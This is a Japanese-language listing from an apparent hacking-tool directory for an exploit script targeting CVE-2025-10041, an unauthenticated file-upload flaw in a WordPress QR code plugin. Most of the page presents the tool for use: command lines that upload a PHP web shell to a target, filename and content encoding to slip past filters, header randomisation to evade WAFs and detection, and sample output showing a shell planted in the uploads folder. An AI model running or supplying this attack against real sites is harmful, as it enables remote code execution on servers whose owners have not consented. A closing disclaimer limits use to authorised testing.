Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/nxploited/cve-2025-10041
ペイロード生成脆弱性分析エクスプロイトIDS/IPS回避ウェブアプリケーション悪用WAFバイパス
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - 未認証の任意ファイルアップロード

リポジトリを見る
3310ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - 未認証の任意ファイルアップロード

🚨 Flex QR Code Generator ≤ 1.2.5 - 未認証の任意ファイルアップロード


📝 説明

WordPress 用プラグイン Flex QR Code Generator は、save_qr_code_to_db() 関数におけるファイルタイプ検証の欠如により、1.2.5 を含む全バージョンで任意ファイルアップロードの脆弱性があります。
これにより、未認証の攻撃者が影響を受けるサイトのサーバーに悪意のあるファイルをアップロードでき、リモートコード実行につながる可能性があります。

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (Critical)

💡 このスクリプトについて

CVE-2025-10041.py は、この脆弱性を利用して攻撃を自動化するために設計されたプロフェッショナルなエクスプロイトツールです。
一般的な保護のバイパスとエンコード技術のための高度な機能を提供します。


⚙️ 特徴

  • 自動脆弱性検出(バージョンチェック)
  • 任意ファイルアップロード(PHP ウェブシェルを含む)
  • ファイル名エンコードバイパス: Base64 または URL エンコード
  • コンテンツエンコードバイパス: シェルコード用の PHP base64 ラッパー
  • 基本的な WAF を回避するランダム化された HTTP ヘッダー
  • カスタムヘッダーサポート
  • 引数解析とヘルプメッセージを備えた完全なコマンドラインインターフェース

🖥️ 使用方法

1. 基本的なエクスプロイト

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. シェルファイル名のエンコード

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. シェルコンテンツのエンコード

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. カスタムシェルファイル名

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. 上級(オプションの組み合わせ)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. カスタムヘッダー

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 ヘルプ

利用可能なすべてのオプションと使用手順を確認するには:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 バイパス技術

  • ファイル名エンコード: 一部のサーバーは .php や不審な名前をブロックします。エンコードによりフィルターを回避できる可能性があります。
  • コンテンツエンコード: シェルコードを eval(base64_decode(...)) でラップすると、コンテンツフィルターをバイパスできる可能性があります。
  • ランダムヘッダー: 検出を避けるために user-agent、referer、cookie をローテーションします。
  • カスタムヘッダー: 高度な回避のために独自のヘッダーを追加します。

📋 出力例

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ 免責事項

このスクリプトは教育、研究、および許可を得たペネトレーションテストの目的のみで提供されます。
自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、固く禁止されており違法です。
著者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。


✍️ 作者:

Nxploited (Khaled Alenazi)


ツールをダウンロード